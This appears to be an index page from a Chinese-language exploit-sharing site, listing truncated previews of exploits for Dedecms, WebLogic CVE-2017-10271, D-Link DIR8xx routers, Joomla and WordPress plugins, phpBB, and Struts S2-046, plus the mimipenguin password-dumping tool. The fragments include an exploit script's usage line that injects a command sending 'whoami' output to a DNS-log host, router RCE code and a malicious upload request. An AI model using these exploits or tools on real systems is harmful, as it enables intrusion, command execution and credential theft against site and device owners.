Dedecms任意用户登录

##前台任意用户户登录 global $dsql; if($kp?me==-1){ $this->M_KeepTime = 3600 * 24 * 7; }else{ $this->M_KeepTime = $kp?me; } $formcache = FALSE; $this->M_ID = $this->GetNum(GetCookie("DedeUserI...

Weblogic(CVE-2017-10271)漏洞Exp

文章作者:莫须有 命令格式:python3 CVE-2017-10271.py url command eg:python3 CVE-2017-10271.py http://test.cve "ping \`whoami\`.dnslog.cve # -*- coding: UTF-8 -*- ''' Created on 2017年12月23日 @author: 莫须有...

D-Link DIR8xx 远程代码执行漏洞

脚本下载: hnap import requests as rq import struct IP = "192.168.0.1" PORT = "80" # Can differ in different version of routers and versions of firmware # SYSTEM_ADDRESS = 0x1B570 # DIR-...

Joomla Photo Contest 1.0.2 SQL Injection Vulnerability

# # # # # # Exploit Title: Joomla! Component Photo Contest 1.0.2- SQL Injection # Dork: N/A # Date: 25.08.2017 # Vendor Homepage: http://keenitsolution.com/ # Software Link: https://codecanyon.net/item/photo-c...

phpBB 3.2.0 Server Side Request Forgery

title: Server Side Request Forgery Vulnerability product: phpBB vulnerable version: 3.2.0 fixed version: 3.2.1 CVE number: impact: Medium homepage: https://www.phpb...

WordPress Ultimate Product Catalogue 4.2.2 Plugin – SQL Injection

# Version: 4.2.2 # Tested on: Ubuntu 16.04 1 - Description: Type user access: register user. $_POST[‘CatID’] is not escaped. http://lenonleite.com.br/en/blog/2017/05/31/english-ultimate-product-catalogue-4-2-2-sql-inj...

WordPress Huge-IT Video Gallery 2.0.4 SQL注入

Advisory ID: DC-2017-01-009 SQL injection Vulnerable Function: $wpdb->get_var( $query ); Vulnerable Variable: $_POST['cat_search'] Vulnerable URL: http://www.vulnerablesite.com/wp-admin/admi...

WordPress KittyCatfish 2.2 Plugin SQL Injection Vulnerability

1. Description An unescaped parameter was found in KittyCatfish version 2.2 (WP plugin). An attacker can exploit this vulnerability to read from the database. The get oarameter 'kc_ad' is vulnerable. 2. Proof of conc...

Linux下密码抓取神器mimipenguin

下载地址:https://github.com/huntergregal/mimipenguin 需要root权限。 以下环境测试通过 Kali 4.3.0 (rolling) x64 (gdm3) Ubuntu Desktop 12.04 LTS x64 (Gnome Keyring 3.18.3-0ubuntu2) Ubuntu Desktop 16.04 LTS x64 (Gnome K...

S2-046 PoC

POST /doUpload.action HTTP/1.1 Host: localhost:8080 Content-Length: 10000000 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAnmUgTEhFhOZpr9z Connection: close ------WebKitFormBoundaryAnmUg...

123456...38

插入图片
返回顶部